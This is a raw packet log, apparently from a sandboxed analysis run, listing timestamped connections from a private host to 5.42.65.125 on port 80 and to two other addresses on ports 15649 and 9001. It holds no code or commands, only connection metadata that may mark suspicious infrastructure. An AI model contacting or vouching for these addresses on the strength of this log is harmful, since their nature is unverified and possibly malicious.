Dec 24, 2023 10:44:33.495769024 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.495850086 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.495909929 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.497873068 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.497925997 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.499773979 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.499917030 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.500021935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.501828909 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.502774000 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.502830982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.502878904 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.504395008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.504494905 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.504549980 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.506288052 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.506465912 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.507637978 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.508439064 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.508518934 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.508578062 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.510906935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.510956049 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.511030912 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.512645006 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.512715101 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.512770891 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.514627934 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.514702082 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.514746904 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.516546965 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.516664982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.518693924 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.518718958 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.518743038 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.518789053 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.520631075 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.520698071 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.520780087 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.522618055 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.522669077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.522737980 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.524470091 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.524575949 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.526340008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.526406050 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.526422977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.526597977 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.528395891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.528528929 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.528584957 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.530149937 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.530211926 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.530270100 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.532151937 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.532212973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.532277107 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.534326077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.534373045 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.536324024 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.536360979 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.536432981 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.537533045 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.537587881 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.537611008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.539542913 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.539587975 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.539627075 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.541497946 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.541558981 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.541567087 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.543138027 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.543167114 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.543214083 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.545166016 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.545212984 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.545223951 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.547188044 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.547207117 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.547502995 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.549201965 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.549242973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.549261093 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.550414085 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.550465107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.550467968 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.550504923 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.553802967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.553852081 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.553915024 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.554591894 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.554649115 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.554703951 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.555424929 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.555471897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.558980942 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.559021950 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.559025049 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.559071064 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.559329987 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.559380054 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.560726881 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.560776949 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.560779095 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.562633038 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.562655926 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.562701941 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.564275980 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.564290047 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.564340115 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.564361095 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.565849066 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.565892935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.565954924 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.567370892 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.567390919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.567446947 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.570489883 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.570506096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.570574045 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.574029922 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.574048042 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.574100971 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.579087019 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.579161882 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.579230070 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.580250978 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.580300093 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.580353022 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.584140062 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.584201097 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.584252119 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.587328911 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.587346077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.587414026 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.590030909 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.590100050 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.590166092 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.593421936 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.593441010 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.593488932 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.596801043 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.596839905 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.596890926 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.599981070 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.600110054 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.602504015 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.602516890 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.602580070 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.607795954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.607822895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.608834028 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.608860016 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.608886003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.608936071 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.612225056 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.612350941 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.612396002 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.615155935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.615205050 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.615396976 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.622922897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.623039007 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.623111010 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.623219967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.623291016 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.623363972 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.624567986 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.624614954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.624798059 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.629379034 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.629393101 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.629432917 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.629930973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.629976988 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.630053997 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.632843971 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.632900000 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.633086920 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.635967016 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.635979891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.636032104 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.638942003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.639054060 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.639192104 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.641473055 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.641491890 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.641573906 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.649482012 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:33.649558067 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:33.649812937 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.649869919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.649919033 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.653003931 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:33.653095007 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.653109074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.653155088 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.659049988 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.660141945 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.660186052 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.660196066 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.660613060 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.660633087 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.660656929 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.661364079 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.661381960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.661410093 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.662220955 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.662275076 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.662275076 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.663048029 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.663136005 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.663192987 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.663832903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.663850069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.663898945 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.666723013 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.666757107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.666795015 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.671068907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.671086073 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.671137094 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.671534061 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.671550989 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.671576023 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.676628113 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.676641941 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.676685095 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.677011013 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.677052975 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.677093983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.679054976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.679471970 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.679526091 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.682296038 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.682390928 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.682440996 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.684359074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.684422970 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.684469938 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.686728954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.686777115 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.686789036 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.689382076 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.689440966 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.689492941 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.694489002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.694555998 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.694561005 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.694802046 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.694844007 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.694947958 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.696602106 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.696659088 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.696690083 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.699491978 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.699537039 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.699543953 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.701822042 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.701858044 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.701936007 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.704185009 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.704250097 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.706675053 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.706757069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.706808090 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.709188938 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.709244967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.709311962 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.711299896 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.711344957 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.711410046 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.713478088 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.713555098 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.713608980 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.720103025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.720159054 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.720247984 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.720546961 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.720681906 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.720751047 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.721463919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.721523046 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.722783089 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.725039005 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.725101948 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.725145102 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.725467920 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.725497007 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.725703001 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.727314949 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.727382898 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.727432013 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.729842901 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.729907990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.729973078 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.731754065 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.731884956 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.731946945 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.787302971 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.787338972 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.787425995 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.787512064 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.787571907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.787616014 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.787683010 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.787736893 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.787780046 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.787784100 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788073063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788129091 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788163900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788196087 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.788196087 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.788233995 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788290024 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788343906 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788388014 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.788459063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788502932 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788542032 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.788570881 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788589001 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788614035 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.788645029 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788698912 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788738966 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.788774967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788814068 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788856030 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.788923979 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.788988113 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.789030075 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.789051056 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.789091110 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.789110899 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.789161921 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.789218903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.789237976 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.789298058 CET	80	49724	5.42.65.125	192.168.2.5
